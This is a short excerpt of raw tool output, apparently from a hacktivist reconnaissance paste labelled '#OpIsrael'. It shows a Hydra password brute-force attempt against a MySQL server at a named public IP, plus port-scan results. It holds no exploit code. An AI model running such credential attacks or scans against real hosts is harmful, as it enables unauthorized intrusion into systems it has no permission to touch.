  2717. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2718.  
  2719. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 15:59:55
  2720. [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
  2721. [DATA] attacking mysql://173.237.136.21:3306/
  2722. [STATUS] 50.00 tries/min, 50 tries in 00:01h, 28 to do in 00:01h, 1 active
  2723. 1 of 1 target completed, 0 valid passwords found
  2724. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:00:55
  2725. + -- --=[Port 3389 closed... skipping.
  2726. + -- --=[Port 5432 closed... skipping.
  2727. + -- --=[Port 5900 closed... skipping.
  2728. + -- --=[Port 5901 closed... skipping.
  2729. + -- --=[Port 8000 closed... skipping.
  2730. + -- --=[Port 8080 opened... running tests...
  2731. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2732. #######################################################################################################################################
  2733. Anonymous JTSEC #OpIsrael Full Recon #19